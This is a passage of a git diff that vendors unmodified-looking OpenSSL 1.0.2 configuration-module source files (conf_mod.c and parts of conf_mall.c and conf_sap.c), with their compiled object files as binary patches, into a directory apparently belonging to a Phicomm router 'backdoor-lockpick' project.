+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+/* Load all OpenSSL builtin modules */
+
+void OPENSSL_load_builtin_modules(void)
+{
+    /* Add builtin modules here */
+    ASN1_add_oid_module();
+#ifndef OPENSSL_NO_ENGINE
+    ENGINE_add_conf_module();
+#endif
+    EVP_add_alg_module();
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mall.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mall.o
new file mode 100644
index 0000000000000000000000000000000000000000..3b1151ebc61118b2c061352e1ccb8e3c739b8619
GIT binary patch
literal 1640
zcmbtT&2G~`5FR&$21rXl9FU5TPpJHKm9$7e4=8EnL_$^)k(2`xTG_FiM))U6Y^ena
zcmy7ykHL{g;4$EcxFMu6v))aeO>%*e*7MD`^X=@;u0L9KW5qB)nE}t?B2p~CR^bBI
z1gyb2l;GF(yT3c%iFo}((9MH`J#*{OO`{|=pRrw5*{(iGMOgi?Q(=|I_cK~#!z#Km
zj!QV2twUG=_)45AcMCC@@$MxUCuL)^v{w9#8zlaYn91~DZIl}uMaj%NI@2orJfEMT
zT8mChyxPUAsvvef%TZK-%k!k**Ou^$_gfI%n3b$!cr&+8>KWMs9106Uerikj-Vz@A
zadgB(CkR*{+8wLa?b<wu9gn-|Fi3_G4`VM4{0Z=;-QKU;yxnMYtsd{y_ic+qz1ymC
z$MbkR^kgbnuR4Nqf`Ou@9iltFhU3q9W+lXA#1mG$iI@!Eg%~2B51X8ZiQ}SA#+g4>
zXzT|LOZ<}rnCB!8Fn2Nm){n!`kC2Pv#Ao={wkL_xe=Flbl(Nw{9{J<s6qs1SKjuec
zC-kQ!{|A^TrdOuFkQ#Di`W@;oauai?H#Ho28&PA>Dw%_;=t-+y)@{k(lf3?-J91uk
zdi_V3Kx_W1zKU8}Q|%L>FjfDdBBWRKmES{N;e6`*e2~L>?hBlwzfiVon)yj0bIN2u
z^-s|*0$NkopUDLMT)O@Z<}JFvGr6F;C%Qk<D!t+t)uz(l=!5oD9+>{AD>!sLar)gM
a1w~nZKtay*{@uX2MfxvNALO(Ib^Tv(0)40e

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mod.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mod.c
new file mode 100644
index 0000000..9acfca4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mod.c
@@ -0,0 +1,597 @@
+/* conf_mod.c */
+/*
+ * Written by Stephen Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/dso.h>
+#include <openssl/x509.h>
+
+#define DSO_mod_init_name "OPENSSL_init"
+#define DSO_mod_finish_name "OPENSSL_finish"
+
+/*
+ * This structure contains a data about supported modules. entries in this
+ * table correspond to either dynamic or static modules.
+ */
+
+struct conf_module_st {
+    /* DSO of this module or NULL if static */
+    DSO *dso;
+    /* Name of the module */
+    char *name;
+    /* Init function */
+    conf_init_func *init;
+    /* Finish function */
+    conf_finish_func *finish;
+    /* Number of successfully initialized modules */
+    int links;
+    void *usr_data;
+};
+
+/*
+ * This structure contains information about modules that have been
+ * successfully initialized. There may be more than one entry for a given
+ * module.
+ */
+
+struct conf_imodule_st {
+    CONF_MODULE *pmod;
+    char *name;
+    char *value;
+    unsigned long flags;
+    void *usr_data;
+};
+
+static STACK_OF(CONF_MODULE) *supported_modules = NULL;
+static STACK_OF(CONF_IMODULE) *initialized_modules = NULL;
+
+static void module_free(CONF_MODULE *md);
+static void module_finish(CONF_IMODULE *imod);
+static int module_run(const CONF *cnf, char *name, char *value,
+                      unsigned long flags);
+static CONF_MODULE *module_add(DSO *dso, const char *name,
+                               conf_init_func *ifunc,
+                               conf_finish_func *ffunc);
+static CONF_MODULE *module_find(char *name);
+static int module_init(CONF_MODULE *pmod, char *name, char *value,
+                       const CONF *cnf);
+static CONF_MODULE *module_load_dso(const CONF *cnf, char *name, char *value,
+                                    unsigned long flags);
+
+/* Main function: load modules from a CONF structure */
+
+int CONF_modules_load(const CONF *cnf, const char *appname,
+                      unsigned long flags)
+{
+    STACK_OF(CONF_VALUE) *values;
+    CONF_VALUE *vl;
+    char *vsection = NULL;
+
+    int ret, i;
+
+    if (!cnf)
+        return 1;
+
+    if (appname)
+        vsection = NCONF_get_string(cnf, NULL, appname);
+
+    if (!appname || (!vsection && (flags & CONF_MFLAGS_DEFAULT_SECTION)))
+        vsection = NCONF_get_string(cnf, NULL, "openssl_conf");
+
+    if (!vsection) {
+        ERR_clear_error();
+        return 1;
+    }
+
+    values = NCONF_get_section(cnf, vsection);
+
+    if (!values)
+        return 0;
+
+    for (i = 0; i < sk_CONF_VALUE_num(values); i++) {
+        vl = sk_CONF_VALUE_value(values, i);
+        ret = module_run(cnf, vl->name, vl->value, flags);
+        if (ret <= 0)
+            if (!(flags & CONF_MFLAGS_IGNORE_ERRORS))
+                return ret;
+    }
+
+    return 1;
+
+}
+
+int CONF_modules_load_file(const char *filename, const char *appname,
+                           unsigned long flags)
+{
+    char *file = NULL;
+    CONF *conf = NULL;
+    int ret = 0;
+    conf = NCONF_new(NULL);
+    if (!conf)
+        goto err;
+
+    if (filename == NULL) {
+        file = CONF_get1_default_config_file();
+        if (!file)
+            goto err;
+    } else
+        file = (char *)filename;
+
+    if (NCONF_load(conf, file, NULL) <= 0) {
+        if ((flags & CONF_MFLAGS_IGNORE_MISSING_FILE) &&
+            (ERR_GET_REASON(ERR_peek_last_error()) == CONF_R_NO_SUCH_FILE)) {
+            ERR_clear_error();
+            ret = 1;
+        }
+        goto err;
+    }
+
+    ret = CONF_modules_load(conf, appname, flags);
+
+ err:
+    if (filename == NULL)
+        OPENSSL_free(file);
+    NCONF_free(conf);
+
+    return ret;
+}
+
+static int module_run(const CONF *cnf, char *name, char *value,
+                      unsigned long flags)
+{
+    CONF_MODULE *md;
+    int ret;
+
+    md = module_find(name);
+
+    /* Module not found: try to load DSO */
+    if (!md && !(flags & CONF_MFLAGS_NO_DSO))
+        md = module_load_dso(cnf, name, value, flags);
+
+    if (!md) {
+        if (!(flags & CONF_MFLAGS_SILENT)) {
+            CONFerr(CONF_F_MODULE_RUN, CONF_R_UNKNOWN_MODULE_NAME);
+            ERR_add_error_data(2, "module=", name);
+        }
+        return -1;
+    }
+
+    ret = module_init(md, name, value, cnf);
+
+    if (ret <= 0) {
+        if (!(flags & CONF_MFLAGS_SILENT)) {
+            char rcode[DECIMAL_SIZE(ret) + 1];
+            CONFerr(CONF_F_MODULE_RUN, CONF_R_MODULE_INITIALIZATION_ERROR);
+            BIO_snprintf(rcode, sizeof rcode, "%-8d", ret);
+            ERR_add_error_data(6, "module=", name, ", value=", value,
+                               ", retcode=", rcode);
+        }
+    }
+
+    return ret;
+}
+
+/* Load a module from a DSO */
+static CONF_MODULE *module_load_dso(const CONF *cnf, char *name, char *value,
+                                    unsigned long flags)
+{
+    DSO *dso = NULL;
+    conf_init_func *ifunc;
+    conf_finish_func *ffunc;
+    char *path = NULL;
+    int errcode = 0;
+    CONF_MODULE *md;
+    /* Look for alternative path in module section */
+    path = NCONF_get_string(cnf, value, "path");
+    if (!path) {
+        ERR_clear_error();
+        path = name;
+    }
+    dso = DSO_load(NULL, path, NULL, 0);
+    if (!dso) {
+        errcode = CONF_R_ERROR_LOADING_DSO;
+        goto err;
+    }
+    ifunc = (conf_init_func *)DSO_bind_func(dso, DSO_mod_init_name);
+    if (!ifunc) {
+        errcode = CONF_R_MISSING_INIT_FUNCTION;
+        goto err;
+    }
+    ffunc = (conf_finish_func *)DSO_bind_func(dso, DSO_mod_finish_name);
+    /* All OK, add module */
+    md = module_add(dso, name, ifunc, ffunc);
+
+    if (!md)
+        goto err;
+
+    return md;
+
+ err:
+    if (dso)
+        DSO_free(dso);
+    CONFerr(CONF_F_MODULE_LOAD_DSO, errcode);
+    ERR_add_error_data(4, "module=", name, ", path=", path);
+    return NULL;
+}
+
+/* add module to list */
+static CONF_MODULE *module_add(DSO *dso, const char *name,
+                               conf_init_func *ifunc, conf_finish_func *ffunc)
+{
+    CONF_MODULE *tmod = NULL;
+    if (supported_modules == NULL)
+        supported_modules = sk_CONF_MODULE_new_null();
+    if (supported_modules == NULL)
+        return NULL;
+    tmod = OPENSSL_malloc(sizeof(CONF_MODULE));
+    if (tmod == NULL)
+        return NULL;
+
+    tmod->dso = dso;
+    tmod->name = BUF_strdup(name);
+    tmod->init = ifunc;
+    tmod->finish = ffunc;
+    tmod->links = 0;
+
+    if (!sk_CONF_MODULE_push(supported_modules, tmod)) {
+        OPENSSL_free(tmod);
+        return NULL;
+    }
+
+    return tmod;
+}
+
+/*
+ * Find a module from the list. We allow module names of the form
+ * modname.XXXX to just search for modname to allow the same module to be
+ * initialized more than once.
+ */
+
+static CONF_MODULE *module_find(char *name)
+{
+    CONF_MODULE *tmod;
+    int i, nchar;
+    char *p;
+    p = strrchr(name, '.');
+
+    if (p)
+        nchar = p - name;
+    else
+        nchar = strlen(name);
+
+    for (i = 0; i < sk_CONF_MODULE_num(supported_modules); i++) {
+        tmod = sk_CONF_MODULE_value(supported_modules, i);
+        if (!strncmp(tmod->name, name, nchar))
+            return tmod;
+    }
+
+    return NULL;
+
+}
+
+/* initialize a module */
+static int module_init(CONF_MODULE *pmod, char *name, char *value,
+                       const CONF *cnf)
+{
+    int ret = 1;
+    int init_called = 0;
+    CONF_IMODULE *imod = NULL;
+
+    /* Otherwise add initialized module to list */
+    imod = OPENSSL_malloc(sizeof(CONF_IMODULE));
+    if (!imod)
+        goto err;
+
+    imod->pmod = pmod;
+    imod->name = BUF_strdup(name);
+    imod->value = BUF_strdup(value);
+    imod->usr_data = NULL;
+
+    if (!imod->name || !imod->value)
+        goto memerr;
+
+    /* Try to initialize module */
+    if (pmod->init) {
+        ret = pmod->init(imod, cnf);
+        init_called = 1;
+        /* Error occurred, exit */
+        if (ret <= 0)
+            goto err;
+    }
+
+    if (initialized_modules == NULL) {
+        initialized_modules = sk_CONF_IMODULE_new_null();
+        if (!initialized_modules) {
+            CONFerr(CONF_F_MODULE_INIT, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+
+    if (!sk_CONF_IMODULE_push(initialized_modules, imod)) {
+        CONFerr(CONF_F_MODULE_INIT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    pmod->links++;
+
+    return ret;
+
+ err:
+
+    /* We've started the module so we'd better finish it */
+    if (pmod->finish && init_called)
+        pmod->finish(imod);
+
+ memerr:
+    if (imod) {
+        if (imod->name)
+            OPENSSL_free(imod->name);
+        if (imod->value)
+            OPENSSL_free(imod->value);
+        OPENSSL_free(imod);
+    }
+
+    return -1;
+
+}
+
+/*
+ * Unload any dynamic modules that have a link count of zero: i.e. have no
+ * active initialized modules. If 'all' is set then all modules are unloaded
+ * including static ones.
+ */
+
+void CONF_modules_unload(int all)
+{
+    int i;
+    CONF_MODULE *md;
+    CONF_modules_finish();
+    /* unload modules in reverse order */
+    for (i = sk_CONF_MODULE_num(supported_modules) - 1; i >= 0; i--) {
+        md = sk_CONF_MODULE_value(supported_modules, i);
+        /* If static or in use and 'all' not set ignore it */
+        if (((md->links > 0) || !md->dso) && !all)
+            continue;
+        /* Since we're working in reverse this is OK */
+        (void)sk_CONF_MODULE_delete(supported_modules, i);
+        module_free(md);
+    }
+    if (sk_CONF_MODULE_num(supported_modules) == 0) {
+        sk_CONF_MODULE_free(supported_modules);
+        supported_modules = NULL;
+    }
+}
+
+/* unload a single module */
+static void module_free(CONF_MODULE *md)
+{
+    if (md->dso)
+        DSO_free(md->dso);
+    OPENSSL_free(md->name);
+    OPENSSL_free(md);
+}
+
+/* finish and free up all modules instances */
+
+void CONF_modules_finish(void)
+{
+    CONF_IMODULE *imod;
+    while (sk_CONF_IMODULE_num(initialized_modules) > 0) {
+        imod = sk_CONF_IMODULE_pop(initialized_modules);
+        module_finish(imod);
+    }
+    sk_CONF_IMODULE_free(initialized_modules);
+    initialized_modules = NULL;
+}
+
+/* finish a module instance */
+
+static void module_finish(CONF_IMODULE *imod)
+{
+    if (imod->pmod->finish)
+        imod->pmod->finish(imod);
+    imod->pmod->links--;
+    OPENSSL_free(imod->name);
+    OPENSSL_free(imod->value);
+    OPENSSL_free(imod);
+}
+
+/* Add a static module to OpenSSL */
+
+int CONF_module_add(const char *name, conf_init_func *ifunc,
+                    conf_finish_func *ffunc)
+{
+    if (module_add(NULL, name, ifunc, ffunc))
+        return 1;
+    else
+        return 0;
+}
+
+void CONF_modules_free(void)
+{
+    CONF_modules_finish();
+    CONF_modules_unload(1);
+}
+
+/* Utility functions */
+
+const char *CONF_imodule_get_name(const CONF_IMODULE *md)
+{
+    return md->name;
+}
+
+const char *CONF_imodule_get_value(const CONF_IMODULE *md)
+{
+    return md->value;
+}
+
+void *CONF_imodule_get_usr_data(const CONF_IMODULE *md)
+{
+    return md->usr_data;
+}
+
+void CONF_imodule_set_usr_data(CONF_IMODULE *md, void *usr_data)
+{
+    md->usr_data = usr_data;
+}
+
+CONF_MODULE *CONF_imodule_get_module(const CONF_IMODULE *md)
+{
+    return md->pmod;
+}
+
+unsigned long CONF_imodule_get_flags(const CONF_IMODULE *md)
+{
+    return md->flags;
+}
+
+void CONF_imodule_set_flags(CONF_IMODULE *md, unsigned long flags)
+{
+    md->flags = flags;
+}
+
+void *CONF_module_get_usr_data(CONF_MODULE *pmod)
+{
+    return pmod->usr_data;
+}
+
+void CONF_module_set_usr_data(CONF_MODULE *pmod, void *usr_data)
+{
+    pmod->usr_data = usr_data;
+}
+
+/* Return default config file name */
+
+char *CONF_get1_default_config_file(void)
+{
+    char *file;
+    int len;
+
+    file = getenv("OPENSSL_CONF");
+    if (file)
+        return BUF_strdup(file);
+
+    len = strlen(X509_get_default_cert_area());
+#ifndef OPENSSL_SYS_VMS
+    len++;
+#endif
+    len += strlen(OPENSSL_CONF);
+
+    file = OPENSSL_malloc(len + 1);
+
+    if (!file)
+        return NULL;
+    BUF_strlcpy(file, X509_get_default_cert_area(), len + 1);
+#ifndef OPENSSL_SYS_VMS
+    BUF_strlcat(file, "/", len + 1);
+#endif
+    BUF_strlcat(file, OPENSSL_CONF, len + 1);
+
+    return file;
+}
+
+/*
+ * This function takes a list separated by 'sep' and calls the callback
+ * function giving the start and length of each member optionally stripping
+ * leading and trailing whitespace. This can be used to parse comma separated
+ * lists for example.
+ */
+
+int CONF_parse_list(const char *list_, int sep, int nospc,
+                    int (*list_cb) (const char *elem, int len, void *usr),
+                    void *arg)
+{
+    int ret;
+    const char *lstart, *tmpend, *p;
+
+    if (list_ == NULL) {
+        CONFerr(CONF_F_CONF_PARSE_LIST, CONF_R_LIST_CANNOT_BE_NULL);
+        return 0;
+    }
+
+    lstart = list_;
+    for (;;) {
+        if (nospc) {
+            while (*lstart && isspace((unsigned char)*lstart))
+                lstart++;
+        }
+        p = strchr(lstart, sep);
+        if (p == lstart || !*lstart)
+            ret = list_cb(NULL, 0, arg);
+        else {
+            if (p)
+                tmpend = p - 1;
+            else
+                tmpend = lstart + strlen(lstart) - 1;
+            if (nospc) {
+                while (isspace((unsigned char)*tmpend))
+                    tmpend--;
+            }
+            ret = list_cb(lstart, tmpend - lstart + 1, arg);
+        }
+        if (ret <= 0)
+            return ret;
+        if (p == NULL)
+            return 1;
+        lstart = p + 1;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mod.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mod.o
new file mode 100644
index 0000000000000000000000000000000000000000..60debaad2d2109a2a2f3db732ab933802add55b8
GIT binary patch
literal 9752
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_sap.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_sap.c
new file mode 100644
index 0000000..d03de24
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_sap.c
@@ -0,0 +1,111 @@
+/* conf_sap.c */
+/*
+ * Written by Stephen Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
